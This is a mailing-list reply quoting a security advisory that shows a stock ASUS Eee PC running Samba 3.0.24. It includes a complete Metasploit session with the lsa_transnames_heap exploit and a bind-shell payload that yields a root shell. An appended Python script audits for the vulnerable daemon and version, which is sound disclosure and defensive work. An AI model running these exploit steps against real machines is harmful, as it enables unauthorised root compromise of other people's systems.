So you ran metasploit and then made a blog post. Is this what 'security research' is considered now? And why did you write this in such a media-hyped way? Trying to get some spotlight?<br><br><div class="gmail_quote">
On Feb 8, 2008 10:47 AM, RISE Security <<a href="mailto:advisories@risesecurity.org">advisories@risesecurity.org</a>> wrote:<br><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
-----BEGIN PGP SIGNED MESSAGE-----<br>Hash: SHA1<br><br>We recently acquired an ASUS Eee PC (if you want to know more about it,<br>a lot of reviews are available on the internet). The first thing we did when<br>we put our hands on the ASUS Eee PC was to test its security. The ASUS<br>
Eee PC comes with a customized version of Xandros operating system<br>installed, and some other bundled software like Mozilla Firefox, Pidgin,<br>Skype and OpenOffice.org.<br><br>Analysing the running processes of the ASUS Eee PC, the first thing that<br>
caught our attention was the running smbd process (the sshd daemon was<br>started by us, and is not enabled by default).<br><br><br>eeepc-rise:/root> ps -e<br> PID TTY TIME CMD<br> 1 ? 00:00:00 fastinit<br>
2 ? 00:00:00 ksoftirqd/0<br> 3 ? 00:00:00 events/0<br> 4 ? 00:00:00 khelper<br> 5 ? 00:00:00 kthread<br> 25 ? 00:00:00 kblockd/0<br> 26 ? 00:00:00 kacpid<br> 128 ? 00:00:00 ata/0<br>
129 ? 00:00:00 ata_aux<br> 130 ? 00:00:00 kseriod<br> 148 ? 00:00:00 pdflush<br> 149 ? 00:00:00 pdflush<br> 150 ? 00:00:00 kswapd0<br> 151 ? 00:00:00 aio/0<br> 152 ? 00:00:00 unionfs_siod/0<br>
778 ? 00:00:00 scsi_eh_0<br> 779 ? 00:00:00 scsi_eh_1<br> 799 ? 00:00:00 kpsmoused<br> 819 ? 00:00:00 kjournald<br> 855 ? 00:00:00 fastinit<br> 857 ? 00:00:00 sh<br> 858 ? 00:00:00 su<br>
859 tty3 00:00:00 getty<br> 862 ? 00:00:00 startx<br> 880 ? 00:00:00 xinit<br> 881 tty2 00:00:06 Xorg<br> 890 ? 00:00:00 udevd<br> 952 ? 00:00:00 ksuspend_usbd<br> 953 ? 00:00:00 khubd<br>
1002 ? 00:00:00 acpid<br> 1027 ? 00:00:00 pciehpd_event<br> 1055 ? 00:00:00 ifplugd<br> 1101 ? 00:00:00 scsi_eh_2<br> 1102 ? 00:00:00 usb-storage<br> 1151 ? 00:00:00 icewm<br> 1185 ? 00:00:01 AsusLauncher<br>
1186 ? 00:00:00 icewmtray<br> 1188 ? 00:00:01 powermonitor<br> 1190 ? 00:00:00 minimixer<br> 1191 ? 00:00:00 networkmonitor<br> 1192 ? 00:00:00 wapmonitor<br> 1193 ? 00:00:00 x-session-manag<br>
1195 ? 00:00:00 x-session-manag<br> 1200 ? 00:00:00 x-session-manag<br> 1201 ? 00:00:00 dispwatch<br> 1217 ? 00:00:00 cupsd<br> 1224 ? 00:00:00 usbstorageapple<br> 1234 ? 00:00:00 kondemand/0<br>
1240 ? 00:00:00 portmap<br> 1248 ? 00:00:00 keyboardstatus<br> 1272 ? 00:00:00 memd<br> 1279 ? 00:00:00 scim-helper-man<br> 1280 ? 00:00:00 scim-panel-gtk<br> 1282 ? 00:00:00 scim-launcher<br>
1297 ? 00:00:00 netserv<br> 1331 ? 00:00:00 asusosd<br> 1476 ? 00:00:00 xandrosncs-agen<br> 1775 ? 00:00:00 dhclient3<br> 2002 ? 00:00:00 nmbd<br> 2004 ? 00:00:00 smbd<br> 2005 ? 00:00:00 smbd<br>
2322 ? 00:00:00 sshd<br> 2345 ? 00:00:00 sshd<br> 2356 pts/0 00:00:00 bash<br> 2362 pts/0 00:00:00 ps<br>eeepc-rise:/root><br><br><br>Retrieving the smbd version, we discovered that it runs a vulnerable<br>
version of Samba (Samba lsa_io_trans_names Heap Overflow), which exploit<br>we published earlier last year.<br><br><br>eeepc-rise:/root> smbd --version<br>Version 3.0.24<br>eeepc-rise:/root><br><br><br>With this information, we ran our exploit against the ASUS Eee PC using<br>
the Debian/Ubuntu target (Xandros is based on Corel Linux, which is<br>Debian based).<br><br><br>msf > use linux/samba/lsa_transnames_heap<br>msf exploit(lsa_transnames_heap) > set RHOST <a href="http://192.168.50.10" target="_blank">192.168.50.10</a><br>
RHOST => <a href="http://192.168.50.10" target="_blank">192.168.50.10</a><br>msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp<br>PAYLOAD => linux/x86/shell_bind_tcp<br>msf exploit(lsa_transnames_heap) > show targets<br>
<br>Exploit targets:<br><br> Id Name<br> -- ----<br> 0 Linux vsyscall<br> 1 Linux Heap Brute Force (Debian/Ubuntu)<br> 2 Linux Heap Brute Force (Gentoo)<br> 3 Linux Heap Brute Force (Mandriva)<br> 4 Linux Heap Brute Force (RHEL/CentOS)<br>
5 Linux Heap Brute Force (SUSE)<br> 6 Linux Heap Brute Force (Slackware)<br> 7 DEBUG<br><br><br>msf exploit(lsa_transnames_heap) > set TARGET 1<br>TARGET => 1<br>msf exploit(lsa_transnames_heap) > exploit<br>
[*] Started bind handler<br>[*] Creating nop sled....<br>...<br>[*] Trying to exploit Samba with address 0x08415000...<br>[*] Connecting to the SMB service...<br>[*] Binding to<br>12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...<br>
[*] Bound to<br>12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...<br>[*] Calling the vulnerable function...<br>[+] Server did not respond, this is expected<br>[*] Command shell session 1 opened (<a href="http://192.168.50.201:33694" target="_blank">192.168.50.201:33694</a> -><br>
<a href="http://192.168.50.10:4444" target="_blank">192.168.50.10:4444</a>)<br>msf exploit(lsa_transnames_heap) > sessions -i 1<br>[*] Starting interaction with 1...<br><br>uname -a<br>Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686<br>
GNU/Linux<br>id<br>uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)<br><br><br>Easy to learn, Easy to work, Easy to root.<br><br><br>The original blog post and more information can be found in our<br>website at <a href="http://risesecurity.org/" target="_blank">http://risesecurity.org/</a>.<br>
<br>Best regards,<br>RISE Security<br>-----BEGIN PGP SIGNATURE-----<br>Version: GnuPG v1.2.6 (GNU/Linux)<br><br>iD8DBQFHrIeHhFjK78TGSUERAvq7AJ9iz2sHD4/cQ0CdlCC1axNiVhwmJwCfddEd<br>6tg6XRBCWHfPWFrSdVKu5oA=<br>=OFwe<br>-----END PGP SIGNATURE-----<br>
<br>_______________________________________________<br>Full-Disclosure - We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html</a><br>
Hosted and sponsored by Secunia - <a href="http://secunia.com/" target="_blank">http://secunia.com/</a><br></blockquote></div><br>
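The finding in the quoted advisory (smbd and nmbd running by default, and smbd reporting Version 3.0.24) can be turned into a host audit. The script below is an added example, not RISE Security's code or Metasploit output; its sample inputs are constructed to mirror the `ps -e` and `smbd --version` output in the post, and the fixed release 3.0.25 is taken from Samba's release history, not from the post.

```python
import re

# Constructed sample inputs in the format of the post's output; the process
# list is trimmed to the lines that matter for the check.
SAMPLE_PS = """\
  PID TTY          TIME CMD
    1 ?        00:00:00 fastinit
 1240 ?        00:00:00 portmap
 2002 ?        00:00:00 nmbd
 2004 ?        00:00:00 smbd
 2005 ?        00:00:00 smbd
 2322 ?        00:00:00 sshd
"""
SAMPLE_VERSION = "Version 3.0.24\n"

# First Samba 3.0.x release that fixed the lsa_io_trans_names heap overflow
# (assumption from Samba's release history, not stated in the post).
FIXED_VERSION = (3, 0, 25)

def running_names(ps_output):
    """Return the set of command names from `ps -e` output (header skipped)."""
    names = set()
    for line in ps_output.splitlines()[1:]:
        fields = line.split()
        if len(fields) >= 4:
            names.add(fields[3])
    return names

def parse_version(version_output):
    """Turn 'Version 3.0.24' into (3, 0, 24); any vendor suffix is ignored."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", version_output)
    if not m:
        raise ValueError("no x.y.z version found in: %r" % version_output)
    return tuple(int(p) for p in m.groups())

def audit(ps_output, version_output, fixed=FIXED_VERSION):
    """List findings: exposed Samba daemons, and an smbd older than the fix."""
    findings = []
    names = running_names(ps_output)
    for daemon in ("smbd", "nmbd"):
        if daemon in names:
            findings.append("%s is running; disable it unless file sharing is needed" % daemon)
    version = parse_version(version_output)
    if "smbd" in names and version < fixed:
        findings.append("smbd %s predates the fixed release %s"
                        % (".".join(map(str, version)), ".".join(map(str, fixed))))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_PS, SAMPLE_VERSION):
        print(finding)
```

A distribution that backports security fixes keeps the older version string, so a version hit is a prompt to check the package changelog rather than proof of exposure.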